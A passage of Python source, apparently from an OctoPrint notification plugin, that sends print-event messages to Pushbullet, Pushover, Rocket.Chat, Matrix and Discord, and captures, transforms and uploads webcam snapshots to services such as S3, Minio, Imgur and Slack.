pb_filename = hosted_url[hosted_url.rfind("/") + 1 :]
self._logger.debug(
"Pushbullet msg image details: file_name: "
+ pb_filename
+ ", file_url="
+ hosted_url
)
self._logger.debug("Executing Pushbullet push file")
##Pushbullet seems to universally accept any image file_type (e.g. for png or jpg) but something is required to render correctly
push_rsp = pb.push_file(
file_name=pb_filename,
file_url=hosted_url,
file_type="image/png",
title=pb_title,
body=pb_body,
channel=channel_obj,
)
else:
##def push_note(self, title, body, device=None, chat=None, email=None, channel=None):
self._logger.debug("Executing Pushbullet push note")
push_rsp = pb.push_note(
title=pb_title, body=pb_body, channel=channel_obj
)
self._logger.debug(
"Pushbullet push response: " + json.dumps(push_rsp)
)
elif not pushoverAppToken == None and len(pushoverAppToken) > 0:
self._logger.debug("Send Pushover msg start")
pushoverUserKey = self._settings.get(
["pushover_config"], merged=True
).get("user_key")
if not pushoverUserKey == None:
pushoverUserKey = pushoverUserKey.strip()
if pushoverUserKey == None or len(pushoverUserKey) == 0:
self._logger.error(
"Pushover User Key not available, skipping message send"
)
return
po_title = None
po_body = None
pb_image_url = None
pb_image_title = None
pb_image_local_path = None
if not pretext == None and len(pretext) > 0:
po_title = pretext
if not text == None and len(text) > 0:
po_body = text
if not footer == None and len(footer) > 0:
if po_body == None:
po_body = ""
elif len(text) > 0:
po_body += newline
po_body += footer
if po_title == None:
po_title = ""
if po_body == None:
po_body = ""
if hosted_url and len(hosted_url) > 0:
if snapshot_upload_method == "PUSHOVER":
##is a local file path
pb_image_local_path = hosted_url
else:
pb_image_url = hosted_url
pb_image_title = hosted_url[hosted_url.rfind("/") + 1 :]
po_sound = event_settings["PushoverSound"]
if po_sound:
po_sound = po_sound.strip()
if len(po_sound) == 0:
po_sound = None
po_priority = event_settings["PushoverPriority"]
if po_priority:
po_priority = po_priority.strip()
if len(po_priority) == 0:
                            po_priority = None
po_expire = None
po_retry = None
if po_priority == "2":
po_expire = 60
po_retry = 30
self._logger.debug("Pushover msg title: " + po_title)
self._logger.debug("Pushover msg body: " + po_body)
self._logger.debug("Pushover msg sound: " + str(po_sound))
self._logger.debug("Pushover msg priority: " + str(po_priority))
self._logger.debug("Pushover msg expire: " + str(po_expire))
self._logger.debug("Pushover msg retry: " + str(po_retry))
try:
po = PushoverAPI(pushoverAppToken)
##send_message(user, message, device=None, title=None, url=None, url_title=None, image=None, priority=None, retry=None, expire=None, callback_url=None, timestamp=None, sound=None, html=False)
po_rsp = po.send_message(
user=pushoverUserKey,
title=po_title,
message=po_body,
url=pb_image_url,
url_title=pb_image_title,
image=pb_image_local_path,
priority=po_priority,
retry=po_retry,
expire=po_expire,
sound=po_sound,
html=1,
)
self._logger.debug(
"Pushover push response: " + json.dumps(po_rsp)
)
except Exception as e:
self._logger.exception("Pushover send error: " + str(e))
if pb_image_local_path:
self._logger.debug(
"Deleting local Pushover asset: " + str(pb_image_local_path)
)
os.remove(pb_image_local_path)
elif (
not rocketChatServerURL == None
and len(rocketChatServerURL) > 0
and not rocketChatUsername == None
and len(rocketChatUsername) > 0
and not rocketChatPassword == None
and len(rocketChatPassword) > 0
):
self._logger.debug("Send Rocket.Chat msg start")
##api = RocketChatAPI(settings={'username': 'someuser', 'password': 'somepassword',
## 'domain': 'https://myrockethchatdomain.com'})
rc = RocketChatAPI(
settings={
"username": rocketChatUsername,
"password": rocketChatPassword,
"domain": rocketChatServerURL,
}
)
                    rc_msg = ""
rc_image_local_path = None
if hosted_url and len(hosted_url) > 0:
if snapshot_upload_method == "ROCKETCHAT":
# is a local file path
rc_image_local_path = hosted_url
if not pretext == None and len(pretext) > 0:
rc_msg = "_*" + pretext + "*_"
if not text == None and len(text) > 0:
if len(rc_msg) > 0:
rc_msg = rc_msg + "\n"
rc_msg = rc_msg + text
if not footer == None and len(footer) > 0:
if len(rc_msg) > 0:
rc_msg = rc_msg + "\n"
rc_msg = rc_msg + footer
self._logger.debug(
"Rocket.Chat local image path: " + str(rc_image_local_path)
)
self._logger.debug("Rocket.Chat msg: " + rc_msg)
try:
##def send_message(self, message, room_id, **kwargs):
##def upload_file(self, room_id, description, file, message, mime_type='text/plain', **kwargs):
rc_room_id = rc.get_room_id(channel)
self._logger.debug(
"Rocket.Chat channel: "
+ channel
+ ", roomid: "
+ str(rc_room_id)
)
if rc_image_local_path and len(rc_image_local_path) > 0:
self._logger.debug(
"Rocket.Chat uploading asset + sending message"
)
rc_rsp = rc.upload_file(
room_id=rc_room_id,
description=None,
file=rc_image_local_path,
message=rc_msg,
mime_type="image/png",
)
else:
self._logger.debug("Rocket.Chat sending message")
rc_rsp = rc.send_message(message=rc_msg, room_id=rc_room_id)
self._logger.debug(
"Rocket.Chat send message response: " + json.dumps(rc_rsp)
)
except requests.exceptions.HTTPError as he:
self._logger.exception(
"Rocket.Chat send HTTP error: " + str(he.response.text)
)
except Exception as e:
self._logger.exception("Rocket.Chat send error: " + str(e))
if rc_image_local_path:
self._logger.debug(
"Deleting local Rocket.Chat asset: "
+ str(rc_image_local_path)
)
os.remove(rc_image_local_path)
elif (
not matrixServerURL == None
and len(matrixServerURL) > 0
and not matrixAccessToken == None
and len(matrixAccessToken) > 0
and not matrixUserID == None
and len(matrixUserID) > 0
):
self._logger.debug("Send Matrix msg start")
##https://matrix.org/docs/spec/client_server/latest#m-room-message-msgtypes
try:
##Room def send_html(self, html, body=None, msgtype="m.text"):
matrix = MatrixClient(
base_url=matrixServerURL,
token=matrixAccessToken,
user_id=matrixUserID,
)
self._logger.debug(
"Matrix authenticated user_id: " + str(matrix.user_id)
)
matrix_msg = ""
if not pretext == None and len(pretext) > 0:
matrix_msg = matrix_msg + "<h3>" + pretext + "</h3>"
##matrix_msg = matrix_msg + "<i><b>" + pretext + "</b><i>"
matrix_msg = matrix_msg + "<blockquote>"
if not text == None and len(text) > 0:
if len(matrix_msg) > 0 and not matrix_msg.endswith(
"<blockquote>"
):
matrix_msg = matrix_msg + "<br/>\n"
matrix_msg = matrix_msg + text
if not footer == None and len(footer) > 0:
if len(matrix_msg) > 0 and not matrix_msg.endswith(
"<blockquote>"
):
matrix_msg = matrix_msg + "<br/>\n"
matrix_msg = matrix_msg + footer
mxc_url = None
if (
hosted_url
and len(hosted_url) > 0
and snapshot_upload_method == "MATRIX"
):
if len(matrix_msg) > 0 and not matrix_msg.endswith(
"<blockquote>"
):
matrix_msg = matrix_msg + "<br/>\n"
matrix_msg = matrix_msg + "<img src='" + hosted_url + "'>"
if len(matrix_msg) > 0:
matrix_msg = matrix_msg + "<br/>\n"
matrix_msg = matrix_msg + "</blockquote><br/>"
self._logger.debug("Matrix msg: " + matrix_msg)
matrix_room = MatrixRoom(matrix, channel)
matrix_rsp = matrix_room.send_html(html=matrix_msg)
self._logger.debug(
"Matrix send message response: " + json.dumps(matrix_rsp)
)
except Exception as e:
self._logger.exception("Matrix send error: " + str(e))
elif (
connection_method == "DISCORD"
and (not channel == None)
and len(channel) > 0
):
try:
discordWebHookUrl = channel
self._logger.debug(
"Discord msg channel WebHook: " + str(discordWebHookUrl)
)
discord_color = None
if color == "good":
discord_color = 242424
elif color == "warning":
discord_color = 16758825
elif color == "danger":
discord_color = 16212835
alternate_username = self._settings.get(
["discord_config"], merged=True
).get("alternate_username")
if (
not alternate_username
or len(alternate_username.strip()) == 0
):
alternate_username = None
avatar_url = self._settings.get(
["discord_config"], merged=True
).get("avatar_url")
if not avatar_url or len(avatar_url.strip()) == 0:
avatar_url = None
self._logger.debug(
"Discord msg alternate username: " + str(alternate_username)
)
self._logger.debug("Discord msg avatar url: " + str(avatar_url))
self._logger.debug("Discord msg color: " + str(discord_color))
content = "**" + pretext + "**"
discord = DiscordWebhook(
url=discordWebHookUrl,
username=alternate_username,
avatar_url=avatar_url,
content=content,
)
embed = DiscordEmbed(
title=None, description="\n" + text, color=discord_color
)
if hosted_url and len(hosted_url) > 0:
if snapshot_upload_method == "DISCORD":
self._logger.debug(
"Discord snapshot image to attach: "
+ str(hosted_url)
)
snapshot_filename = hosted_url[
hosted_url.rfind("/") + 1 :
]
with open(hosted_url, "rb") as f:
discord.add_file(
file=f.read(), filename=snapshot_filename
)
else:
embed.set_image(url=hosted_url)
if (
event == "MovieDone"
and "movie" in event_payload
and snapshot_upload_method == "DISCORD"
):
timelapse_movie = event_payload["movie"]
self._logger.debug(
"Discord timelapse movie to attach: "
+ str(timelapse_movie)
)
movie_filename = timelapse_movie[
timelapse_movie.rfind("/") + 1 :
]
with open(timelapse_movie, "rb") as f:
discord.add_file(file=f.read(), filename=movie_filename)
if not footer == None and len(footer) > 0:
embed.set_footer(text=footer)
discord.add_embed(embed)
self._logger.debug(
"Discord WebHook message json: " + json.dumps(discord.json)
)
discordRsp = discord.execute()
self._logger.debug(
"Discord WebHook execute response: "
+ "\n Status Code: "
+ str(discordRsp.status_code)
+ "\n Headers: \n"
+ str(discordRsp.headers)
+ "\n Content: \n"
+ str(discordRsp.content)
)
except Exception as e:
self._logger.exception(
"Discord WebHook message send error: " + str(e)
)
except Exception as e:
self._logger.exception("Send message error: " + str(e))
tmp_imgur_client = None
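    ## Captures the configured snapshot image(s); returns the local path directly for services that
    ## upload natively, otherwise hands the file to upload_asset for external hosting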
def upload_snapshot(self):
snapshot_upload_method = self._settings.get(
["snapshot_upload_method"], merged=True
)
self._logger.debug(
"Upload snapshot - snapshot_upload_method: " + snapshot_upload_method
)
if snapshot_upload_method == None or snapshot_upload_method == "NONE":
return None, None, None
connection_method = self.connection_method()
local_file_path, error_msgs = self.retrieve_snapshot_images()
if local_file_path == None:
return None, error_msgs, None
dest_filename = local_file_path[local_file_path.rfind("/") + 1 :]
self._logger.debug(
"Upload snapshot - connection_method: "
+ str(connection_method)
+ ", snapshot_upload_method: "
+ snapshot_upload_method
)
        # Return the local file path; later logic will actually upload the asset
if (
(connection_method == "APITOKEN" and snapshot_upload_method == "SLACK")
or (
connection_method == "PUSHOVER" and snapshot_upload_method == "PUSHOVER"
)
or (
connection_method == "ROCKETCHAT"
and snapshot_upload_method == "ROCKETCHAT"
)
or (connection_method == "DISCORD" and snapshot_upload_method == "DISCORD")
):
return local_file_path, error_msgs, None
return self.upload_asset(local_file_path, dest_filename, None, error_msgs)
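    ## Uploads the rendered timelapse movie via the configured upload method; returns (url, error_msgs)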
def upload_timelapse_movie(self, local_file_path, channels):
try:
            error_msgs = []
            snapshot_upload_method = self._settings.get(
                ["snapshot_upload_method"], merged=True
            )
if snapshot_upload_method == None or snapshot_upload_method == "NONE":
return None, None
if (
snapshot_upload_method == "PUSHOVER"
or snapshot_upload_method == "ROCKETCHAT"
or snapshot_upload_method == "MATRIX"
or snapshot_upload_method == "DISCORD"
):
return None, None
if snapshot_upload_method == "IMGUR":
# Imgur does not currently support video uploads
self._logger.exception(
"Timelapse upload error: Imgur does not currently support video uploads"
)
error_msgs.append("Imgur does not currently support video uploads")
return None, error_msgs
wait_start = time.time()
while not os.path.exists(local_file_path):
if time.time() - wait_start > 15:
self._logger.exception(
"Timelapse upload error: Unable to locate timelapse on disk"
)
error_msgs.append("Unable to locate timelapse on disk")
return None, error_msgs
time.sleep(5)
file_path, file_name = os.path.split(local_file_path)
dest_filename = file_name
url, error_msgs, slack_rsp = self.upload_asset(
local_file_path, dest_filename, channels, error_msgs
)
self._logger.debug(
"Upload timelapse ret: URL: "
+ str(url)
+ ", ErrorMsgs: "
+ str(error_msgs)
)
return url, error_msgs
except Exception as e:
self._logger.exception("Snapshot upload error: " + str(e))
error_msgs.append(str(e))
return None, error_msgs
##Channels is only required/used for Slack uploads
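    ## Uploads a local file to the configured hosting service (S3, Minio, Imgur, Slack, Pushbullet,
    ## or Matrix) and returns (hosted_url, error_msgs, slack_response); the local file is deleted afterwards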
def upload_asset(self, local_file_path, dest_filename, channels, error_msgs):
snapshot_upload_method = self._settings.get(
["snapshot_upload_method"], merged=True
)
if snapshot_upload_method == None or snapshot_upload_method == "NONE":
return None, error_msgs, None
connection_method = self.connection_method()
if error_msgs == None:
error_msgs = []
self._logger.debug(
"Upload asset - Snapshot upload method: "
+ snapshot_upload_method
+ ", Local file path: "
+ str(local_file_path)
+ ", Destination filename: "
+ str(dest_filename)
)
if local_file_path:
try:
if snapshot_upload_method == "S3":
try:
self._logger.debug("Uploading snapshot via S3")
s3_upload_start = time.time()
s3_config = self._settings.get(["s3_config"], merged=True)
awsAccessKey = s3_config["AWSAccessKey"]
awsSecretKey = s3_config["AWSsecretKey"]
s3Bucket = s3_config["s3Bucket"]
fileExpireDays = int(s3_config["file_expire_days"])
s3URLStyle = s3_config["URLStyle"]
s3_expiration = timedelta(days=fileExpireDays)
imgData = open(local_file_path, "rb")
uploadFilename = dest_filename
s3conn = tinys3.Connection(awsAccessKey, awsSecretKey, tls=True)
s3UploadRsp = s3conn.upload(
uploadFilename,
imgData,
s3Bucket,
headers={"x-amz-acl": "public-read"},
expires=s3_expiration,
)
self._logger.debug("S3 upload response: " + str(s3UploadRsp))
s3_upload_elapsed = time.time() - s3_upload_start
self._logger.debug(
"Uploaded asset to S3 in "
+ str(round(s3_upload_elapsed, 2))
+ " seconds"
)
if s3URLStyle and s3URLStyle == "VIRTUAL":
return (
"https://"
+ s3Bucket
+ ".s3.amazonaws.com/"
+ uploadFilename,
error_msgs,
None,
)
else:
return (
"https://s3.amazonaws.com/"
+ s3Bucket
+ "/"
+ uploadFilename,
error_msgs,
None,
)
except Exception as e:
self._logger.exception(
"Failed to upload asset to S3: " + str(e)
)
error_msgs.append("S3 error: " + str(e))
elif snapshot_upload_method == "MINIO":
try:
self._logger.debug("Uploading asset via Minio")
minio_upload_start = time.time()
minio_config = self._settings.get(["minio_config"], merged=True)
minioAccessKey = minio_config["AccessKey"]
minioSecretKey = minio_config["SecretKey"]
minioBucket = minio_config["Bucket"]
if minio_config["secure"]:
minioURI = "https://{endpoint}/{bucket}/".format(
endpoint=minio_config["Endpoint"], bucket=minioBucket
)
else:
minioURI = "http://{endpoint}/{bucket}/".format(
endpoint=minio_config["Endpoint"], bucket=minioBucket
)
uploadFilename = dest_filename
minioClient = Minio(
minio_config["Endpoint"],
access_key=minioAccessKey,
secret_key=minioSecretKey,
secure=minio_config["secure"],
)
minioUploadRsp = minioClient.fput_object(
minioBucket, uploadFilename, local_file_path
)
self._logger.debug(
"Minio upload response: " + str(minioUploadRsp)
)
minio_upload_elapsed = time.time() - minio_upload_start
self._logger.debug(
"Uploaded asset to Minio in "
+ str(round(minio_upload_elapsed, 2))
+ " seconds"
)
return minioURI + uploadFilename, error_msgs, None
except Exception as e:
self._logger.exception(
"Failed to upload asset to Minio: " + str(e)
)
error_msgs.append("Minio error: " + str(e))
elif snapshot_upload_method == "IMGUR":
try:
self._logger.debug("Uploading asset via Imgur")
imgur_upload_start = time.time()
imgur_config = self._settings.get(["imgur_config"], merged=True)
imgur_client_id = imgur_config["client_id"]
imgur_client_secret = imgur_config["client_secret"]
imgur_client_refresh_token = imgur_config["refresh_token"]
imgur_album_id = imgur_config["album_id"]
if (
imgur_client_refresh_token == None
or len(imgur_client_refresh_token.strip()) == 0
):
imgur_client_refresh_token = None
else:
imgur_client_refresh_token = (
imgur_client_refresh_token.strip()
)
if imgur_album_id == None or len(imgur_album_id.strip()) == 0:
imgur_album_id = None
else:
imgur_album_id = imgur_album_id.strip()
if (
imgur_client_refresh_token == None
or len(imgur_client_refresh_token) == 0
) and (imgur_album_id and len(imgur_album_id) > 0):
self._logger.error(
"Usage of an Imgur Album ID requires a valid Refresh Token"
)
error_msgs.append(
"Imgur error: Use of an Album ID requires a valid Refresh Token"
)
return None, error_msgs, None
imgur_client = ImgurClient(
imgur_client_id,
imgur_client_secret,
None,
imgur_client_refresh_token,
)
self.tmp_imgur_client = imgur_client
imgur_upload_config = {}
if not imgur_album_id == None:
imgur_upload_config["album"] = imgur_album_id
imgur_upload_config["title"] = dest_filename
##imgur_upload_config['title'] = 'ImageTitle123'
##imgur_upload_config['description'] = 'ImageDescription123'
self._logger.debug(
"Uploading to Imgur - Config: "
+ str(imgur_upload_config)
+ ", File path: "
+ local_file_path
+ ", File exists: "
+ str(os.path.isfile(local_file_path))
)
##Required to work around Imgur servers not always properly returning a 403
if imgur_client.auth:
self._logger.debug("Executing manual Imgur auth refresh")
imgur_client.auth.refresh()
imgurUploadRsp = imgur_client.upload_from_path(
local_file_path, config=imgur_upload_config, anon=False
)
self._logger.debug(
"Imgur upload response: " + str(imgurUploadRsp)
)
imgur_upload_elapsed = time.time() - imgur_upload_start
self._logger.debug(
"Uploaded asset to Imgur in "
+ str(round(imgur_upload_elapsed, 2))
+ " seconds"
)
imgurUrl = imgurUploadRsp["link"]
return imgurUrl, error_msgs, None
except ImgurClientError as ie:
self._logger.exception(
"Failed to upload snapshot to Imgur (ImgurClientError): "
+ str(ie.error_message)
+ ", StatusCode: "
+ str(ie.status_code)
)
if not self.tmp_imgur_client == None:
self._logger.exception(
"ImgurClient Credits: "
+ str(self.tmp_imgur_client.credits)
)
error_msgs.append("Imgur error: " + str(ie.error_message))
error_msgs.append(
"Imgur credits: " + str(self.tmp_imgur_client.credits)
)
except ImgurClientRateLimitError as rle:
self._logger.exception(
"Failed to upload snapshot to Imgur (ImgurClientRateLimitError): "
+ str(rle)
)
if not self.tmp_imgur_client == None:
self._logger.exception(
"ImgurClient Credits: "
+ str(self.tmp_imgur_client.credits)
)
error_msgs.append("Imgur error: " + str(rle))
error_msgs.append(
"Imgur credits: " + str(self.tmp_imgur_client.credits)
)
except Exception as e:
self._logger.exception(
"Failed to upload snapshot to Imgur (Exception): " + str(e)
)
error_msgs.append("Imgur error: " + str(e))
elif (
connection_method == "SLACKPI" and snapshot_upload_method == "SLACK"
):
return self.upload_slack_asset(
local_file_path,
dest_filename,
dest_filename,
channels,
error_msgs,
)
elif (
connection_method == "PUSHBULLET"
and snapshot_upload_method == "PUSHBULLET"
):
try:
self._logger.debug("Uploading asset via Pushbullet")
pushbullet_upload_start = time.time()
pushbulletAccessToken = self._settings.get(
["pushbullet_config"], merged=True
).get("access_token")
pb_rsp = None
if not pushbulletAccessToken == None:
pushbulletAccessToken = pushbulletAccessToken.strip()
if (
pushbulletAccessToken == None
or len(pushbulletAccessToken) == 0
):
self._logger.error(
"Pushbullet connection not available, skipping asset upload"
)
else:
with open(local_file_path, "rb") as img_file:
try:
pb = Pushbullet(pushbulletAccessToken)
pb_rsp = pb.upload_file(img_file, dest_filename)
self._logger.debug(
"Pushbullet asset upload response: "
+ str(pb_rsp)
)
pushbullet_upload_elapsed = (
time.time() - pushbullet_upload_start
)
self._logger.debug(
"Uploaded asset to Pushbullet in "
+ str(round(pushbullet_upload_elapsed, 2))
+ " seconds"
)
except Exception as e:
self._logger.exception(
"Error while uploading snapshot to Pushbullet, sending only a note: {}".format(
str(e)
)
)
error_msgs.append("Pushbullet error: " + str(e))
if pb_rsp and "file_url" in pb_rsp:
return pb_rsp["file_url"], error_msgs, None
except Exception as e:
self._logger.exception(
"Failed to upload asset to Pushbullet: " + str(e)
)
error_msgs.append("Pushbullet error: " + str(e))
elif (
connection_method == "MATRIX" and snapshot_upload_method == "MATRIX"
):
try:
self._logger.debug("Uploading asset via Matrix")
matrix_upload_start = time.time()
matrixServerURL = self._settings.get(
["matrix_config"], merged=True
).get("server_url")
matrixAccessToken = self._settings.get(
["matrix_config"], merged=True
).get("access_token")
matrixUserID = self._settings.get(
["matrix_config"], merged=True
).get("user_id")
if not matrixServerURL == None:
matrixServerURL = matrixServerURL.strip()
if not matrixAccessToken == None:
matrixAccessToken = matrixAccessToken.strip()
if not matrixUserID == None:
matrixUserID = matrixUserID.strip()
matrix_rsp = None
if (
matrixServerURL == None
or len(matrixServerURL) == 0
or matrixAccessToken == None
or len(matrixAccessToken) == 0
or matrixUserID == None
or len(matrixUserID) == 0
):
self._logger.error(
"Matrix connection not available, skipping asset upload"
)
else:
matrix = MatrixClient(
base_url=matrixServerURL,
token=matrixAccessToken,
user_id=matrixUserID,
)
self._logger.debug(
"Matrix authenticated user_id: " + str(matrix.user_id)
)
with open(local_file_path, "rb") as img_file:
try:
img_bytes = img_file.read()
matrix_rsp = matrix.upload(
content=img_bytes, content_type="image/png"
)
self._logger.debug(
"Matrix upload response: "
+ json.dumps(matrix_rsp)
)
matrix_upload_elapsed = (
time.time() - matrix_upload_start
)
self._logger.debug(
"Uploaded asset to Matrix in "
+ str(round(matrix_upload_elapsed, 2))
+ " seconds"
)
return matrix_rsp, error_msgs, None
except Exception as e:
self._logger.exception(
"Error while uploading snapshot to Matrix, sending only a note: {}".format(
str(e)
)
)
error_msgs.append("Matrix error: " + str(e))
except Exception as e:
self._logger.exception(
"Failed to upload asset to Matrix: " + str(e)
)
error_msgs.append("Matrix error: " + str(e))
except Exception as e:
self._logger.exception("Asset upload error: %s" % str(e))
error_msgs.append(str(e.message))
finally:
if local_file_path:
self._logger.debug(
"Deleting local asset after upload: " + str(local_file_path)
)
os.remove(local_file_path)
self.tmp_imgur_client = None
return None, error_msgs, None
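    ## Uploads a file via the Slack files.upload API and returns its private download URL;
    ## requires the APITOKEN connection method and a non-empty channel list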
def upload_slack_asset(
self, local_file_path, dest_filename, file_description, channels, error_msgs
):
if error_msgs == None:
error_msgs = []
connection_method = self.connection_method()
if connection_method == None or connection_method != "APITOKEN":
self._logger.error("Slack API connection required for Slack asset uploads")
error_msgs.append("Slack API connection required for Slack asset uploads")
return None, error_msgs, None
self._logger.debug("Uploading asset via Slack")
if channels == None or len(channels) == 0:
self._logger.exception("Slack asset upload failed. Channels list was empty")
error_msgs.append("Slack channels list was empty")
return None, error_msgs, None
slack_upload_start = time.time()
slackAPIConnection = None
slackAPIToken = self._settings.get(["slack_apitoken_config"], merged=True).get(
"api_token"
)
if not slackAPIToken == None:
slackAPIToken = slackAPIToken.strip()
if slackAPIToken and len(slackAPIToken) > 0:
slackAPIConnection = Slacker(slackAPIToken, timeout=SLACKER_TIMEOUT)
if slackAPIConnection == None:
self._logger.exception("Slack API connection unavailable")
error_msgs.append("Slack API connection unavailable")
return None, error_msgs, None
asset_msg = {
"file_": local_file_path,
"filename": dest_filename,
"title": file_description,
"channels": channels,
}
self._logger.debug("Uploading file to Slack: " + str(asset_msg))
resp = slackAPIConnection.files.upload(**asset_msg)
self._logger.debug("Slack API upload snapshot response: " + resp.raw)
error_msg = None
if resp == None:
error_msg = "Unknown"
elif not resp.successful:
error_msg = resp.error
if not error_msg == None:
self._logger.exception(
"Slack asset upload failed. Error: " + str(error_msg)
)
error_msgs.append(str(error_msg))
return None, error_msgs, None
slack_upload_elapsed = time.time() - slack_upload_start
self._logger.debug(
"Uploaded asset to Slack in "
+ str(round(slack_upload_elapsed, 2))
+ " seconds"
)
download_url = resp.body.get("file").get("url_private_download")
return download_url, error_msgs, resp
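    ## Downloads the local webcam snapshot plus any additional snapshot URLs in parallel threads and
    ## returns a single (possibly combined) local image path along with any error messages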
def retrieve_snapshot_images(self):
urls = []
localCamera = self._settings.global_get(["webcam", "snapshot"])
localCameraFlipH = self._settings.global_get(["webcam", "flipH"])
localCameraFlipV = self._settings.global_get(["webcam", "flipV"])
localCameraRotate90 = self._settings.global_get(["webcam", "rotate90"])
self._logger.debug(
"Local camera settings - Snapshot URL:"
+ str(localCamera)
+ ", FlipH: "
+ str(localCameraFlipH)
+ ", FlipV: "
+ str(localCameraFlipV)
+ ", Rotate90: "
+ str(localCameraRotate90)
)
if not localCamera == None:
urls.append(
(localCamera, localCameraFlipH, localCameraFlipV, localCameraRotate90)
)
additional_snapshot_urls = self._settings.get(
["additional_snapshot_urls"], merged=True
)
if not additional_snapshot_urls == None:
for entry in additional_snapshot_urls.split(","):
entry = entry.strip()
if len(entry) == 0:
continue
entry = urllib2.unquote(entry)
parts = entry.split("|")
url = parts[0].strip()
flipH = False
flipV = False
rotate90 = False
if len(parts) == 4:
flipH = parts[1].strip() == "true"
flipV = parts[2].strip() == "true"
rotate90 = parts[3].strip() == "true"
if len(url) > 0:
urls.append((url, flipH, flipV, rotate90))
self._logger.debug("Snapshot URLs: " + str(urls))
threads = []
thread_responses = []
downloaded_images = []
error_msgs = []
download_start = time.time()
idx = 0
for url_data in urls:
url, flip_h, flip_v, rotate_90 = url_data
thread_responses.append((None, None))
t = threading.Thread(
target=self.download_image,
args=(url, flip_h, flip_v, rotate_90, idx, thread_responses),
)
t.setDaemon(True)
threads.append(t)
t.start()
idx += 1
for t in threads:
t.join()
download_elapsed = time.time() - download_start
self._logger.debug(
"Downloaded all "
+ str(len(urls))
+ " snapshots in "
+ str(round(download_elapsed, 2))
+ " seconds"
)
self._logger.debug("download_image thread_responses: " + str(thread_responses))
for (downloaded_image, error_msg) in thread_responses:
if downloaded_image == None and error_msg == None:
continue
if not downloaded_image == None:
downloaded_images.append(downloaded_image)
if not error_msg == None:
error_msgs.append(error_msg)
## The single returned image will be deleted by the caller
if len(downloaded_images) == 0:
return None, error_msgs
if len(downloaded_images) > 1:
## downloaded_images will be deleted internally by combine_images
combined_image, error_msg = self.combine_images(downloaded_images)
if not error_msg == None:
error_msgs.append(error_msg)
return combined_image, error_msgs
else:
return downloaded_images[0], error_msgs
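    ## Helpers to give downloaded temp files a unique, recognizable snapshot filename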
def generate_snapshot_filename(self):
return "Snapshot_" + str(uuid.uuid1()).replace("-", "") + ".png"
def rename_snapshot_filename(self, tmp_filename):
try:
self._logger.debug(
"Rename tmp file - Existing tmp filename: " + str(tmp_filename)
)
new_filename = (
tmp_filename[: tmp_filename.rfind("/")]
+ "/"
+ self.generate_snapshot_filename()
)
self._logger.debug(
"Rename tmp file - New tmp filename: " + str(new_filename)
)
os.rename(tmp_filename, new_filename)
return new_filename
except Exception as e:
self._logger.exception("Error renaming tmp filename: " + str(e))
return tmp_filename
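    ## Downloads one snapshot URL (honoring embedded basic-auth credentials), applies the configured
    ## flip/rotate transposes, and stores (local_path, error) in responses[rsp_idx]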
def download_image(self, url, flip_h, flip_v, rotate_90, rsp_idx, responses):
imgData = None
temp_fd = None
temp_filename = None
try:
download_start = time.time()
basic_auth_user = None
basic_auth_pwd = None
##If basic auth credentials were passed in via protocol://user:pwd@host:port/path, parse them out
if "@" in url:
first_split = url.split("@")
host_port_path = first_split[1]
second_split = first_split[0].split("//")
new_url = second_split[0] + "//" + first_split[1]
auth_split = second_split[1].split(":")
if len(auth_split) > 0:
basic_auth_user = auth_split[0]
if len(auth_split) > 1:
basic_auth_pwd = auth_split[1]
else:
basic_auth_pwd = ""
## We have credentials
if not basic_auth_user == None:
url = new_url
imgReq = urllib2.Request(url)
if not basic_auth_user == None and not basic_auth_pwd == None:
auth_header = base64.b64encode(
"%s:%s" % (basic_auth_user, basic_auth_pwd)
)
imgReq.add_header("Authorization", "Basic %s" % auth_header)
imgRsp = urllib2.urlopen(imgReq, timeout=2)
temp_fd, temp_filename = mkstemp()
os.close(temp_fd)
temp_filename = self.rename_snapshot_filename(temp_filename)
self._logger.debug("Snapshot download temp filename: " + str(temp_filename))
temp_file = open(temp_filename, "wb")
temp_file.write(imgRsp.read())
imgByteCount = temp_file.tell()
temp_file.close()
download_elapsed = time.time() - download_start
self._logger.debug(
"Downloaded snapshot from URL: "
+ url
+ " ("
+ octoprint.util.get_formatted_size(imgByteCount)
+ ") in "
+ str(round(download_elapsed, 2))
+ " seconds to "
+ temp_filename
)
self._logger.debug(
"Transpose operations for URL: "
+ url
+ " - FlipH: "
+ str(flip_h)
+ ", FlipV: "
+ str(flip_v)
+ ", Rotate90: "
+ str(rotate_90)
)
if flip_h or flip_v or rotate_90:
self._logger.debug("Opening file to transpose image for URL: " + url)
tmp_img = Image.open(temp_filename)
if flip_h:
self._logger.debug("Flipping image horizontally for URL: " + url)
tmp_img = tmp_img.transpose(Image.FLIP_LEFT_RIGHT)
self._logger.debug("Horizontally flip complete for URL: " + url)
if flip_v:
self._logger.debug("Flipping image vertically for URL: " + url)
tmp_img = tmp_img.transpose(Image.FLIP_TOP_BOTTOM)
self._logger.debug("Vertical flip complete for URL: " + url)
if rotate_90:
self._logger.debug("Rotating image 90 degrees for URL: " + url)
tmp_img = tmp_img.transpose(Image.ROTATE_90)
self._logger.debug("90 degree rotate complete for URL: " + url)
self._logger.debug(
"Saving transposed image for URL: " + url + " to " + temp_filename
)
if tmp_img.mode in ("RGBA", "LA"):
self._logger.debug(
"Converting transposed image to RGB from: " + str(tmp_img.mode)
)
rgb_img = Image.new("RGB", tmp_img.size, (0, 0, 0))
rgb_img.paste(tmp_img, mask=tmp_img.split()[3])
tmp_img = rgb_img
tmp_img.save(temp_filename, "JPEG")
responses[rsp_idx] = (temp_filename, None)
except Exception as e:
self._logger.exception(
"Error downloading snapshot - URL: " + url + ", Error: " + str(e)
)
responses[rsp_idx] = (None, str(e))
finally:
if not imgData == None:
imgData.close()
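    ## Stitches multiple downloaded snapshots into one image using the configured vertical,
    ## horizontal, or grid arrangement; the source images are deleted once the combined image is written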
def combine_images(self, local_paths):
temp_fd = None
temp_filename = None
try:
generate_image_start = time.time()
images = []
for local_path in local_paths:
try:
img = Image.open(local_path)
images.append(img)
except Exception as e:
self._logger.exception("Error opening downloaded image: " + str(e))
image_count = len(images)
            if image_count == 0:
return None, None
widths, heights = zip(*(i.size for i in images))
total_width = sum(widths)
max_width = max(widths)
total_height = sum(heights)
max_height = max(heights)
grid_size = 0, 0
grid_rows = None
grid_row_images = []
grid_row_heights = []
grid_col_widths = []
arrangement = self._settings.get(["snapshot_arrangement"], merged=True)
if arrangement == None:
arrangement = "HORIZONTAL"
##Lazy grid layout (no formula) supports up to 12 images
if arrangement == "GRID" and image_count > 12:
arrangement = "HORIZONTAL"
if arrangement == "VERTICAL":
grid_size = image_count, 1
elif arrangement == "HORIZONTAL":
grid_size = 1, image_count
elif arrangement == "GRID":
